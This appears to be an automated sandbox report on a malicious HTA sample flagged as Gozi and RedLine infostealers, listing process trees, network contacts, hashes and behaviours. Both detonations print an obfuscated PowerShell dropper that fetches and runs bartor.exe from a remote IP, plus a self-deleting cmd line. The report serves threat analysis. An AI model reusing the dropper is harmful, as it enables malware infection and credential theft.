Malware Analysis Report

2024-10-19 01:08

Sample ID 220805-byny1seddm
Target 55.hta
SHA256 e49c5359656eedbca5bffe8ab5aada0e0b3301c47e426b028f27d6e89027adad
Tags
gozi_ifsb redline 11111 bart banker discovery infostealer spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e49c5359656eedbca5bffe8ab5aada0e0b3301c47e426b028f27d6e89027adad

Threat Level: Known bad

The file 55.hta was found to be: Known bad.

Malicious Activity Summary

gozi_ifsb redline 11111 bart banker discovery infostealer spyware stealer trojan

RedLine

Gozi, Gozi IFSB

RedLine payload

Executes dropped EXE

Downloads MZ/PE file

Blocklisted process makes network request

Checks computer location settings

Loads dropped DLL

Reads user/profile data of web browsers

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-08-05 01:33

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-08-05 01:33

Reported

2022-08-05 01:36

Platform

win7-20220715-en

Max time kernel

109s

Max time network

106s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\55.hta"

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\bartor.exe N/A
N/A N/A C:\Users\Admin\Downloads\WinZip.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\bartor.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1136 wrote to memory of 1876 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1136 wrote to memory of 1876 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1136 wrote to memory of 1876 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1136 wrote to memory of 1876 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1876 wrote to memory of 1916 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\bartor.exe
PID 1876 wrote to memory of 1916 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\bartor.exe
PID 1876 wrote to memory of 1916 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\bartor.exe
PID 1876 wrote to memory of 1916 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\bartor.exe
PID 1916 wrote to memory of 696 N/A C:\Users\Admin\AppData\Roaming\bartor.exe C:\Windows\SysWOW64\cmd.exe
PID 1916 wrote to memory of 696 N/A C:\Users\Admin\AppData\Roaming\bartor.exe C:\Windows\SysWOW64\cmd.exe
PID 1916 wrote to memory of 696 N/A C:\Users\Admin\AppData\Roaming\bartor.exe C:\Windows\SysWOW64\cmd.exe
PID 1916 wrote to memory of 696 N/A C:\Users\Admin\AppData\Roaming\bartor.exe C:\Windows\SysWOW64\cmd.exe
PID 696 wrote to memory of 1944 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\Downloads\WinZip.exe
PID 696 wrote to memory of 1944 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\Downloads\WinZip.exe
PID 696 wrote to memory of 1944 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\Downloads\WinZip.exe
PID 696 wrote to memory of 1944 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\Downloads\WinZip.exe
PID 1916 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Roaming\bartor.exe C:\Windows\SysWOW64\cmd.exe
PID 1916 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Roaming\bartor.exe C:\Windows\SysWOW64\cmd.exe
PID 1916 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Roaming\bartor.exe C:\Windows\SysWOW64\cmd.exe
PID 1916 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Roaming\bartor.exe C:\Windows\SysWOW64\cmd.exe
PID 1580 wrote to memory of 1444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 1580 wrote to memory of 1444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 1580 wrote to memory of 1444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 1580 wrote to memory of 1444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\55.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function EnIuqI($tUJRTxlOGTzBBb, $sVHQTsPPna){[IO.File]::WriteAllBytes($tUJRTxlOGTzBBb, $sVHQTsPPna)};function wteXJMZiCxLIHWyVK($tUJRTxlOGTzBBb){if($tUJRTxlOGTzBBb.EndsWith((bDbIUiomifraxsd @(32622,32676,32684,32684))) -eq $True){rundll32.exe $tUJRTxlOGTzBBb }elseif($tUJRTxlOGTzBBb.EndsWith((bDbIUiomifraxsd @(32622,32688,32691,32625))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $tUJRTxlOGTzBBb}else{Start-Process $tUJRTxlOGTzBBb}};function jLwXZBeGxQAjckUU($EnIuqI){$OVWWVDSjZvvguN=(bDbIUiomifraxsd @(32648,32681,32676,32676,32677,32686));$XHGthyalbeewKOEQPWZ=(Get-ChildItem $EnIuqI -Force);$XHGthyalbeewKOEQPWZ.Attributes=$XHGthyalbeewKOEQPWZ.Attributes -bor ([IO.FileAttributes]$OVWWVDSjZvvguN).value__};function hjUZSOEutRzDQjOlSx($ioMMScKpkah){$iHEFhbXBYCwXIirUfY = New-Object (bDbIUiomifraxsd @(32654,32677,32692,32622,32663,32677,32674,32643,32684,32681,32677,32686,32692));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$sVHQTsPPna = $iHEFhbXBYCwXIirUfY.DownloadData($ioMMScKpkah);return $sVHQTsPPna};function bDbIUiomifraxsd($DUtYcPEQU){$RsPcedMKJvyiH=32576;$qkuvmRDebHfQ=$Null;foreach($hGnJeoBRHGIJa in $DUtYcPEQU){$qkuvmRDebHfQ+=[char]($hGnJeoBRHGIJa-$RsPcedMKJvyiH)};return $qkuvmRDebHfQ};function RtvXhZhq(){$veIehdmMqql = $env:AppData + '\';$qitNbz = $veIehdmMqql + 'bartor.exe'; if (Test-Path -Path $qitNbz){wteXJMZiCxLIHWyVK $qitNbz;}Else{ $iplTNEkBLCQEiP = hjUZSOEutRzDQjOlSx (bDbIUiomifraxsd @(32680,32692,32692,32688,32634,32623,32623,32625,32633,32627,32622,32629,32630,32622,32625,32628,32630,32622,32625,32627,32625,32623,32674,32673,32690,32692,32687,32690,32622,32677,32696,32677));EnIuqI $qitNbz $iplTNEkBLCQEiP;wteXJMZiCxLIHWyVK $qitNbz;};jLwXZBeGxQAjckUU $qitNbz;;;;;}RtvXhZhq;

C:\Users\Admin\AppData\Roaming\bartor.exe

"C:\Users\Admin\AppData\Roaming\bartor.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C start C:\Users\%UserName%\Downloads\WinZip.exe

C:\Users\Admin\Downloads\WinZip.exe

C:\Users\Admin\Downloads\WinZip.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 7 & Del "bartor.exe"

C:\Windows\SysWOW64\choice.exe

choice /C Y /N /D Y /T 7

Network

Country Destination Domain Proto
RU 193.56.146.131:80 193.56.146.131 tcp
RU 193.56.146.131:80 193.56.146.131 tcp
NL 80.66.87.52:2500 tcp

Files

memory/1136-54-0x0000000075681000-0x0000000075683000-memory.dmp

memory/1876-55-0x0000000000000000-mapping.dmp

memory/1876-57-0x0000000072740000-0x0000000072CEB000-memory.dmp

\Users\Admin\AppData\Roaming\bartor.exe

MD5 0f2be4fe0362766dcf339d4c03326bc4
SHA1 69e26e9e75e8a8359d232d8e14318b9235e1a828
SHA256 2f96d468f1c62104047e67e8dcd2a8590924e99f85f5c009f348f67bd83e2529
SHA512 8d3d86dd98c04fea1a212be212b155dec3895fb88806c6bc460820635179ca3e9f60296cf448d3054fcccd38c311097395d108e6481aba5c60a6308d9b785150

memory/1916-59-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\bartor.exe

MD5 0f2be4fe0362766dcf339d4c03326bc4
SHA1 69e26e9e75e8a8359d232d8e14318b9235e1a828
SHA256 2f96d468f1c62104047e67e8dcd2a8590924e99f85f5c009f348f67bd83e2529
SHA512 8d3d86dd98c04fea1a212be212b155dec3895fb88806c6bc460820635179ca3e9f60296cf448d3054fcccd38c311097395d108e6481aba5c60a6308d9b785150

C:\Users\Admin\AppData\Roaming\bartor.exe

MD5 0f2be4fe0362766dcf339d4c03326bc4
SHA1 69e26e9e75e8a8359d232d8e14318b9235e1a828
SHA256 2f96d468f1c62104047e67e8dcd2a8590924e99f85f5c009f348f67bd83e2529
SHA512 8d3d86dd98c04fea1a212be212b155dec3895fb88806c6bc460820635179ca3e9f60296cf448d3054fcccd38c311097395d108e6481aba5c60a6308d9b785150

memory/1876-62-0x0000000072740000-0x0000000072CEB000-memory.dmp

memory/1916-63-0x0000000000320000-0x00000000003A2000-memory.dmp

memory/1916-65-0x0000000000470000-0x0000000000488000-memory.dmp

memory/696-66-0x0000000000000000-mapping.dmp

\Users\Admin\Downloads\WinZip.exe

MD5 468042278a3e4841d3e33ccca10d99ca
SHA1 22532f37096a200d448420359c01bbebaaf6b820
SHA256 b92e9e2c758e32857506f9472cc51aec4b499afa6f703f7c40218e4e4258da86
SHA512 4c85e54b26ee0540fa9350f92a85f7e254f3c11481f3a3099c96ce47b83963ed4661216b2c4109e76e94ee3821310e3a35b2e37fc076a13f9f663dc6bc992ebf

C:\Users\Admin\Downloads\WinZip.exe

MD5 468042278a3e4841d3e33ccca10d99ca
SHA1 22532f37096a200d448420359c01bbebaaf6b820
SHA256 b92e9e2c758e32857506f9472cc51aec4b499afa6f703f7c40218e4e4258da86
SHA512 4c85e54b26ee0540fa9350f92a85f7e254f3c11481f3a3099c96ce47b83963ed4661216b2c4109e76e94ee3821310e3a35b2e37fc076a13f9f663dc6bc992ebf

memory/1944-70-0x0000000000000000-mapping.dmp

\Users\Admin\Downloads\WinZip.exe

MD5 468042278a3e4841d3e33ccca10d99ca
SHA1 22532f37096a200d448420359c01bbebaaf6b820
SHA256 b92e9e2c758e32857506f9472cc51aec4b499afa6f703f7c40218e4e4258da86
SHA512 4c85e54b26ee0540fa9350f92a85f7e254f3c11481f3a3099c96ce47b83963ed4661216b2c4109e76e94ee3821310e3a35b2e37fc076a13f9f663dc6bc992ebf

C:\Users\Admin\Downloads\WinZip.exe

MD5 468042278a3e4841d3e33ccca10d99ca
SHA1 22532f37096a200d448420359c01bbebaaf6b820
SHA256 b92e9e2c758e32857506f9472cc51aec4b499afa6f703f7c40218e4e4258da86
SHA512 4c85e54b26ee0540fa9350f92a85f7e254f3c11481f3a3099c96ce47b83963ed4661216b2c4109e76e94ee3821310e3a35b2e37fc076a13f9f663dc6bc992ebf

memory/1944-73-0x0000000000230000-0x0000000000330000-memory.dmp

memory/1944-74-0x00000000003A0000-0x00000000003AB000-memory.dmp

memory/1944-75-0x0000000000400000-0x0000000000462000-memory.dmp

memory/1944-76-0x0000000000610000-0x000000000061D000-memory.dmp

memory/1944-79-0x0000000000230000-0x0000000000330000-memory.dmp

memory/1944-80-0x0000000000400000-0x0000000000462000-memory.dmp

memory/1916-81-0x0000000000620000-0x0000000000664000-memory.dmp

memory/1916-82-0x0000000000310000-0x0000000000316000-memory.dmp

memory/1580-83-0x0000000000000000-mapping.dmp

memory/1444-84-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-08-05 01:33

Reported

2022-08-05 01:36

Platform

win10v2004-20220721-en

Max time kernel

147s

Max time network

152s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\55.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\bartor.exe N/A
N/A N/A C:\Users\Admin\Downloads\WinZip.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\bartor.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\bartor.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4364 wrote to memory of 876 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4364 wrote to memory of 876 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4364 wrote to memory of 876 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 876 wrote to memory of 4600 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\bartor.exe
PID 876 wrote to memory of 4600 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\bartor.exe
PID 876 wrote to memory of 4600 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\bartor.exe
PID 4600 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Roaming\bartor.exe C:\Windows\SysWOW64\cmd.exe
PID 4600 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Roaming\bartor.exe C:\Windows\SysWOW64\cmd.exe
PID 4600 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Roaming\bartor.exe C:\Windows\SysWOW64\cmd.exe
PID 4200 wrote to memory of 2668 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\Downloads\WinZip.exe
PID 4200 wrote to memory of 2668 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\Downloads\WinZip.exe
PID 4200 wrote to memory of 2668 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\Downloads\WinZip.exe
PID 4600 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Roaming\bartor.exe C:\Windows\SysWOW64\cmd.exe
PID 4600 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Roaming\bartor.exe C:\Windows\SysWOW64\cmd.exe
PID 4600 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Roaming\bartor.exe C:\Windows\SysWOW64\cmd.exe
PID 3448 wrote to memory of 2200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 3448 wrote to memory of 2200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 3448 wrote to memory of 2200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\55.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function EnIuqI($tUJRTxlOGTzBBb, $sVHQTsPPna){[IO.File]::WriteAllBytes($tUJRTxlOGTzBBb, $sVHQTsPPna)};function wteXJMZiCxLIHWyVK($tUJRTxlOGTzBBb){if($tUJRTxlOGTzBBb.EndsWith((bDbIUiomifraxsd @(32622,32676,32684,32684))) -eq $True){rundll32.exe $tUJRTxlOGTzBBb }elseif($tUJRTxlOGTzBBb.EndsWith((bDbIUiomifraxsd @(32622,32688,32691,32625))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $tUJRTxlOGTzBBb}else{Start-Process $tUJRTxlOGTzBBb}};function jLwXZBeGxQAjckUU($EnIuqI){$OVWWVDSjZvvguN=(bDbIUiomifraxsd @(32648,32681,32676,32676,32677,32686));$XHGthyalbeewKOEQPWZ=(Get-ChildItem $EnIuqI -Force);$XHGthyalbeewKOEQPWZ.Attributes=$XHGthyalbeewKOEQPWZ.Attributes -bor ([IO.FileAttributes]$OVWWVDSjZvvguN).value__};function hjUZSOEutRzDQjOlSx($ioMMScKpkah){$iHEFhbXBYCwXIirUfY = New-Object (bDbIUiomifraxsd @(32654,32677,32692,32622,32663,32677,32674,32643,32684,32681,32677,32686,32692));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$sVHQTsPPna = $iHEFhbXBYCwXIirUfY.DownloadData($ioMMScKpkah);return $sVHQTsPPna};function bDbIUiomifraxsd($DUtYcPEQU){$RsPcedMKJvyiH=32576;$qkuvmRDebHfQ=$Null;foreach($hGnJeoBRHGIJa in $DUtYcPEQU){$qkuvmRDebHfQ+=[char]($hGnJeoBRHGIJa-$RsPcedMKJvyiH)};return $qkuvmRDebHfQ};function RtvXhZhq(){$veIehdmMqql = $env:AppData + '\';$qitNbz = $veIehdmMqql + 'bartor.exe'; if (Test-Path -Path $qitNbz){wteXJMZiCxLIHWyVK $qitNbz;}Else{ $iplTNEkBLCQEiP = hjUZSOEutRzDQjOlSx (bDbIUiomifraxsd @(32680,32692,32692,32688,32634,32623,32623,32625,32633,32627,32622,32629,32630,32622,32625,32628,32630,32622,32625,32627,32625,32623,32674,32673,32690,32692,32687,32690,32622,32677,32696,32677));EnIuqI $qitNbz $iplTNEkBLCQEiP;wteXJMZiCxLIHWyVK $qitNbz;};jLwXZBeGxQAjckUU $qitNbz;;;;;}RtvXhZhq;

C:\Users\Admin\AppData\Roaming\bartor.exe

"C:\Users\Admin\AppData\Roaming\bartor.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C start C:\Users\%UserName%\Downloads\WinZip.exe

C:\Users\Admin\Downloads\WinZip.exe

C:\Users\Admin\Downloads\WinZip.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 7 & Del "bartor.exe"

C:\Windows\SysWOW64\choice.exe

choice /C Y /N /D Y /T 7

Network

Country Destination Domain Proto
RU 193.56.146.131:80 193.56.146.131 tcp
RU 193.56.146.131:80 193.56.146.131 tcp
IE 20.50.73.9:443 tcp
NL 67.26.105.254:80 tcp
US 8.8.8.8:53 trackingg-protectioon.cdn1.mozilla.net udp
NL 80.66.87.52:2500 tcp
NL 67.26.105.254:80 tcp
NL 194.76.225.168:80 tcp

Files

memory/876-130-0x0000000000000000-mapping.dmp

memory/876-131-0x0000000002AC0000-0x0000000002AF6000-memory.dmp

memory/876-132-0x00000000055E0000-0x0000000005C08000-memory.dmp

memory/876-133-0x0000000005430000-0x0000000005452000-memory.dmp

memory/876-134-0x0000000005D10000-0x0000000005D76000-memory.dmp

memory/876-135-0x0000000005DF0000-0x0000000005E56000-memory.dmp

memory/876-136-0x00000000063D0000-0x00000000063EE000-memory.dmp

memory/876-137-0x0000000007450000-0x00000000074E6000-memory.dmp

memory/876-138-0x0000000006880000-0x000000000689A000-memory.dmp

memory/876-139-0x0000000006900000-0x0000000006922000-memory.dmp

memory/876-140-0x0000000007AA0000-0x0000000008044000-memory.dmp

memory/876-141-0x00000000086D0000-0x0000000008D4A000-memory.dmp

memory/4600-142-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\bartor.exe

MD5 0f2be4fe0362766dcf339d4c03326bc4
SHA1 69e26e9e75e8a8359d232d8e14318b9235e1a828
SHA256 2f96d468f1c62104047e67e8dcd2a8590924e99f85f5c009f348f67bd83e2529
SHA512 8d3d86dd98c04fea1a212be212b155dec3895fb88806c6bc460820635179ca3e9f60296cf448d3054fcccd38c311097395d108e6481aba5c60a6308d9b785150

C:\Users\Admin\AppData\Roaming\bartor.exe

MD5 0f2be4fe0362766dcf339d4c03326bc4
SHA1 69e26e9e75e8a8359d232d8e14318b9235e1a828
SHA256 2f96d468f1c62104047e67e8dcd2a8590924e99f85f5c009f348f67bd83e2529
SHA512 8d3d86dd98c04fea1a212be212b155dec3895fb88806c6bc460820635179ca3e9f60296cf448d3054fcccd38c311097395d108e6481aba5c60a6308d9b785150

memory/4600-145-0x0000000000530000-0x00000000005B2000-memory.dmp

memory/4200-146-0x0000000000000000-mapping.dmp

memory/2668-147-0x0000000000000000-mapping.dmp

C:\Users\Admin\Downloads\WinZip.exe

MD5 468042278a3e4841d3e33ccca10d99ca
SHA1 22532f37096a200d448420359c01bbebaaf6b820
SHA256 b92e9e2c758e32857506f9472cc51aec4b499afa6f703f7c40218e4e4258da86
SHA512 4c85e54b26ee0540fa9350f92a85f7e254f3c11481f3a3099c96ce47b83963ed4661216b2c4109e76e94ee3821310e3a35b2e37fc076a13f9f663dc6bc992ebf

C:\Users\Admin\Downloads\WinZip.exe

MD5 468042278a3e4841d3e33ccca10d99ca
SHA1 22532f37096a200d448420359c01bbebaaf6b820
SHA256 b92e9e2c758e32857506f9472cc51aec4b499afa6f703f7c40218e4e4258da86
SHA512 4c85e54b26ee0540fa9350f92a85f7e254f3c11481f3a3099c96ce47b83963ed4661216b2c4109e76e94ee3821310e3a35b2e37fc076a13f9f663dc6bc992ebf

memory/2668-150-0x0000000000529000-0x000000000053A000-memory.dmp

memory/2668-151-0x00000000004E0000-0x00000000004EB000-memory.dmp

memory/2668-152-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2668-153-0x0000000000610000-0x000000000061D000-memory.dmp

memory/2668-156-0x0000000000529000-0x000000000053A000-memory.dmp

memory/2668-157-0x0000000000400000-0x0000000000462000-memory.dmp

memory/4600-158-0x000000000BA70000-0x000000000C088000-memory.dmp

memory/4600-159-0x000000000B4E0000-0x000000000B4F2000-memory.dmp

memory/4600-160-0x000000000B610000-0x000000000B71A000-memory.dmp

memory/4600-161-0x000000000B540000-0x000000000B57C000-memory.dmp

memory/4600-162-0x000000000C090000-0x000000000C122000-memory.dmp

memory/4600-163-0x000000000C2B0000-0x000000000C326000-memory.dmp

memory/4600-164-0x000000000C470000-0x000000000C48E000-memory.dmp

memory/4600-165-0x000000000CDE0000-0x000000000CFA2000-memory.dmp

memory/4600-166-0x000000000D4E0000-0x000000000DA0C000-memory.dmp

memory/3448-167-0x0000000000000000-mapping.dmp

memory/2200-168-0x0000000000000000-mapping.dmp